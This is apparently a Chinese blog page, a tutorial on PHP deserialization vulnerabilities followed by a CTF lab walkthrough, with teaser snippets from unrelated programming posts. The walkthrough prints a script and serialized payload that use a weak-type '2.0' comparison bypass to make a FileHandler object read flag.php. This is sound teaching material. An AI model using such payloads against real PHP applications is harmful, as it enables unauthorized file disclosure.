当前位置：首页 > news >正文

web漏洞-PHP反序列化

news 2026/2/9 20:32:34

PHP反序列化

序列化

将对象转换成字符串

反序列化

相反，将字符串转换成对象。

数据格式的转换对象的序列化有利于对象的保存和传输，也可以让多个文件共享对象。

原理

未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而导致代码执行，SQL注入，目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

serialize() //将一个对象转换成一个字符串

unserialize() //将字符串还原成一个对象

//例如：
//无类，序列化和反序列化
<?php$key="rumilc";
echo serialize($key);echo "</br>";
$key2 = 's:6:"rumilc";';
echo unserialize($key2);

涉及技术

有类和无类

有类和无类区别：有无class定义

基本概念

有类：触发魔术方法

魔术方法具体参考

触发：
unserialize函数的变量可控，文件中存在可利用的类，类中有魔术方法：
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
......

利用

真实应用下

CTF中常见

危害

SQL注入

目录遍历

代码执行

…

CTF靶场

题目地址

进入环境：

给了php代码，进行分析

根据题目以及代码，向下发现了unserialize

思路：
第一：获取flag存储flag.php
第二：两个魔术方法__destruct和 __construct
第三：传输str参数数据后触发destruct，存在is_valid过滤
第四：__destruct中会调用process,其中op=1写入及op=2读取
第五：涉及对象FileHandler，变量op及filename,content，进行构造输出

进行构造，序列化处理：

<?php
class FileHandler
{public $op = '2.0'; //源码观察发现，op为1时候是执行写入，为2时执行读//使用 ' 2'也可以绕过op的值public $filename="flag.php"; //文件开头调用的是flag.phppublic $content; //可以不用写，或者任意
}
$flag = new FileHandler();
echo serialize($flag);
?>

执行完成后，得到：

O:11:“FileHandler”:3:{s:2:“op”;s:3:“2.0”;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}

将此作为参数值，赋值给str进行请求

发现有返回，查看源码

源码当中：

得到答案

$FLAG = "ctfhub{2edb689c4de533b460e6c2af}";

还可以将其还原成对象：

<?php$key = 'O:11:"FileHandler":3:{s:2:"op";s:3:"2.0";s:8:"filename";s:8:"flag.php";s:7:"content";N;}';var_dump(unserialize($key));
?>

还原的对象结果：

object(__PHP_Incomplete_Class)#1 (4) {["__PHP_Incomplete_Class_Name"]=>string(11) "FileHandler"["op"]=>string(3) "2.0"["filename"]=>string(8) "flag.php"["content"]=>NULL
}

反序列化魔术方法调用，弱类型绕过，ascii绕过

== ：弱等于。在比较前会先把两种字符串类型转成相同的再进行比较。

=== ：强等于。在比较前会先判断两种字符串类型是否相同再进行比较，如果类型不同直接返回不相等。既比较值也比较类型。

使用该类对flag进行读取，这里面能利用的只有__destruct函数（析构函数）。

__destruct函数对$this->op进行了===判断并内容在2字符串时会赋值为1，

process函数中使用==对$this->op进行判断（为2的情况下才能读取内容），

因此这里存在弱类型比较，可以使用数字2或字符串’ 2’绕过判断。

is_valid函数还对序列化字符串进行了校验，因为成员被protected修饰，

因此序列化字符串中会出现ascii为0的字符。经过测试，在PHP7.2+的环境中，

使用public修饰成员并序列化，反序列化后成员也会被public覆盖修饰。

web漏洞-PHP反序列化

目录 PHP反序列化序列化反序列化原理涉及技术利用危害CTF靶场 PHP反序列化序列化将对象转换成字符串反序列化相反，将字符串转换成对象。数据格式的转换对象的序列化有利于对象的保存和传输，也可以让多个文件共享对象。原理未对用户输入的序列化字…...

编程日记 2023/10/7 7:40:39

Redis-分布式锁

分布式锁相关内容超卖问题切入可以使用互斥锁给先获取到锁的线程加锁吗？使用redis分布式锁解决超卖问题setnx命令实现分布式锁为什么需要设置过期时间？Redis实现分布式锁如何合理控制锁的有效时长 redisson实现分布式锁超卖问题切入我们先来看一个项目…...

编程日记 2023/10/7 7:33:32

什么时候使用继承，好莱坞原则（设计模式与开发实践 P11+）

文章目录好莱坞原则真的需要继承吗？ 好莱坞原则如果你熟悉继承方法、乃至模板方法模式后，就可以了解一个设计原则好莱坞原则新人演员把简历发给好莱坞，许久之后没有回应不耐烦打电话给好莱坞，只收到回应：不要来找…...

编程日记 2023/10/7 7:32:31

蓝桥等考Python组别十四级001

第一部分：选择题 1、Python L14 （15分） 运行下面程序，输出的结果是（ ）。 d {A: 501, B: 602, C: 703, D: 804} print(d[B]) 501602703804 正确答案：B 2、Python L14 （15分…...

编程日记 2023/10/7 7:30:30

TI单芯片毫米波雷达代码走读（二十七）—— 角度维（3D）处理之通道间幅相一致性补偿

TI单芯片毫米波雷达1642代码走读（〇）——总纲书接上回，我们知晓了3D处理的主要流程，相信大家都已理解基本的原理。在正式进行数据分析之前还有一步关键的步骤需要说明，即通道间的幅相一致性补偿问题。细心的朋友可能注意到，在3D处理的的原码中有两个函数我一直没有讲：…...

编程日记 2023/10/7 7:25:25

数据结构 2.2 单循环链表

2.单循环链表 data|next——>data|next——>data|next——>头节点 1.初始化链表 2.增加节点（头插法、尾插法） 3.删除节点 4.遍历链表定义一个结构体，存放data域和指针域： typedef struct Node {//定义一个结构体&…...

编程日记 2023/10/7 7:24:24

矩阵距离——多源BFS

给定一个 N 行 M 列的 01 矩阵 A，A[i][j] 与 A[k][l] 之间的曼哈顿距离定义为： dist(A[i][j],A[k][l])|i−k||j−l| 输出一个 N 行 M 列的整数矩阵 B，其中：B[i][j]min1≤x≤N,1≤y≤M,A[x][y]1dist(A[i][j],A[x][y]) 输入格式第…...

编程日记 2023/10/7 7:22:23

关于在 Notion 中使用 Markdown 语法

关于在 Notion 中使用 Markdown 语法习惯使用的 Markdown 的伙伴们应该知道，当需要加粗字体时，会首先输入 ** **，然后在里面填内容。但是在 Notion 中，这个就不太行了。它所定义的规则是从前往后，也就是先键入**&…...

编程日记 2023/10/7 7:20:21

sigmoid和softmax函数有什么区别

Sigmoid函数和Softmax函数都是常用的激活函数，但它们的主要区别在于应用场景和输出结果的性质。 Sigmoid函数（也称为 Logistic函数）： Sigmoid函数将输入值映射到0到1之间的连续实数范围，通常用于二元分类问题。 Si…...

编程日记 2023/10/7 7:15:16

第五章：最新版零基础学习 PYTHON 教程—Python 字符串操作指南（第七节 - Python 中使用 % 进行字符串格式化）

在Python中，可以通过不同的方法来实现对字符串所需的格式化。他们之中有一些是; 1) 使用 % 2) 使用 {} 3)使用模板字符串本文讨论使用 % 进行格式化。使用 % 的格式类似于 C 编程语言中的“printf”。%d – 整数 %f – 浮点数 %s – 字符串 %x – 十六进制 %o – 八进制下面的…...

编程日记 2023/10/7 7:09:10

【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）

一，VMware下载地址： 百度网盘链接链接：百度网盘请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固，支持教育网加速，支持手机端。注册使用百度网盘即可享受免费存储空间https:/…...

编程日记 2023/10/7 7:08:09

Eclipse MAT解析headp dump，total size小于file size

1. 问题描述使用Eclipse MAT分析20GB的heap dump文件最后解析出来dump size只有1GB 2. 原因：heap dump中包含许多unreachable objects Eclipse MAT的官方文档，《Basic Tutorial》章节，有对上图的Overview page做介绍针对total size小…...

编程日记 2023/10/7 7:07:08

【数据挖掘】2022年 Quiz 1-3 整理带答案

目录 Quiz 1Quiz 2Quiz 3Quiz 1 Problem 1 (50%). Consider the set of training data shown below. Here, A, B, C C C are attributes, and D D...

编程日记 2023/10/7 7:04:05

AcWing 288. 休息时间，《算法竞赛进阶指南》，环形与后效性处理

288. 休息时间 - AcWing题库在某个星球上，一天由 N 个小时构成，我们称 0 点到 1 点为第 1 个小时、1 点到 2 点为第 2 个小时，以此类推。在第 i 个小时睡觉能够恢复 Ui 点体力。在这个星球上住着一头牛，它每天要休息 B 个小…...

编程日记 2023/10/7 7:02:02

一文掌握Linux系统信息查看命令（CPU、内存、进程、网口、磁盘、硬件）

引言大家好，欢迎来到我的技术博客！如果你是一名Linux系统管理员、开发者或者热衷于学习Linux系统的用户，那么你一定需要掌握查看系统信息的命令。在这篇博客中，我将为你介绍一些常用的Linux命令，帮助你快速了解和监控…...

编程日记 2023/10/7 7:00:00

UE5.1编辑器拓展【三、脚本化资产行为，删除无引用资产】

目录需要考虑的问题重定向的修复函数代码： 删除无引用资产代码需要添加的头文件和模块在我们删除资产的时候，会发现，有些资产在删除的时候会出现有被什么什么引用，还有的是没有被引用。而我们如果直接选择一片去进行…...

编程日记 2023/10/7 6:55:55

防抖和节流的实现

防抖和节流的实现什么是防抖和节流实现防抖和节流防抖节流防抖和节流的应用场景什么是防抖和节流防抖和节流是前端开发中常用的两种性能优化技术。为什么需要防抖和节流呢？ 两者目的都是为了防止某个时间段内操作频繁触发，造成性能消耗。防抖&…...

编程日记 2023/10/7 6:54:54

alsa pcm接口之阻塞和非阻塞打开和异步通知模式

阻塞和非阻塞打开(Blocked and non-blocked open) 当设备打开在一个阻塞或非阻塞模式,ALSA pcm api接口使用不同的行为，模式可以指定通过mode参数通过snd_pcm_open函数,blocked mode阻塞模式是默认打开方式,在这个模式下,行为表现为当资源被其他应用程序使用,应该阻…...

编程日记 2023/10/7 6:52:52

Python Random模块详解

Random模块详解随机数 random模块 randint(a, b) 返回[a, b]之间的整数randrange ([start,] stop [,step]) 从指定范围内，按指定基数递增的集合中获取一个随机数，基数缺省值为1。random.randrange(1,7,2)choice(seq) 从非空序列的元素中随机挑选一个…...

编程日记 2023/10/7 6:51:51

Vue3 模糊搜索筛选

Vue3 模糊搜索筛选环境： vue3 tselement plus 目标： 输入框输入内容，对展示的列表进行模糊搜索筛选匹配的内容。代码如下： <div style"margin-top: 50px"><el-input v-model"valueInput" size&…...

编程日记 2023/10/7 6:50:50

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …...

编程新知 2026/2/8 4:37:37

VB.net复制Ntag213卡写入UID

本示例使用的发卡器：https://item.taobao.com/item.htm?ftt&id615391857885 一、读取旧Ntag卡的UID和数据 Private Sub Button15_Click(sender As Object, e As EventArgs) Handles Button15.Click轻松读卡技术支持:网站:Dim i, j As IntegerDim cardidhex, …...

编程新知 2026/2/9 6:48:28

如何在看板中体现优先级变化

在看板中有效体现优先级变化的关键措施包括：采用颜色或标签标识优先级、设置任务排序规则、使用独立的优先级列或泳道、结合自动化规则同步优先级变化、建立定期的优先级审查流程。其中，设置任务排序规则尤其重要，因为它让看板视觉上直观地体…...

编程新知 2026/1/23 12:42:28

解决Ubuntu22.04 VMware失败的问题 ubuntu入门之二十八

现象1 打开VMware失败 Ubuntu升级之后打开VMware上报需要安装vmmon和vmnet，点击确认后如下提示最终上报fail 解决方法内核升级导致，需要在新内核下重新下载编译安装查看版本 $ vmware -v VMware Workstation 17.5.1 build-23298084$ lsb_release…...

编程新知 2026/1/24 10:07:40

dedecms 织梦自定义表单留言增加ajax验证码功能

增加ajax功能模块，用户不点击提交按钮，只要输入框失去焦点，就会提前提示验证码是否正确。一，模板上增加验证码 <input name"vdcode"id"vdcode" placeholder"请输入验证码" type"text&quo…...

编程新知 2026/2/5 17:51:52

定时器任务——若依源码分析

分析util包下面的工具类schedule utils： ScheduleUtils 是若依中用于与 Quartz 框架交互的工具类，封装了定时任务的创建、更新、暂停、删除等核心逻辑。 createScheduleJob createScheduleJob 用于将任务注册到 Quartz，先构建任务的 JobD…...

编程新知 2026/1/26 14:24:46

渲染学进阶内容——模型

最近在写模组的时候发现渲染器里面离不开模型的定义，在渲染的第二篇文章中简单的讲解了一下关于模型部分的内容，其实不管是方块还是方块实体，都离不开模型的内容 🧱 一、CubeListBuilder 功能解析 CubeListBuilder 是 Minecraft Java 版模型系统的核心构建器，用于动态创…...

编程新知 2025/11/25 22:59:17

MySQL用户和授权

开放MySQL白名单可以通过iptables-save命令确认对应客户端ip是否可以访问MySQL服务： test: # iptables-save | grep 3306 -A mp_srv_whitelist -s 172.16.14.102/32 -p tcp -m tcp --dport 3306 -j ACCEPT -A mp_srv_whitelist -s 172.16.4.16/32 -p tcp -m tcp -…...

编程新知 2025/8/25 19:12:45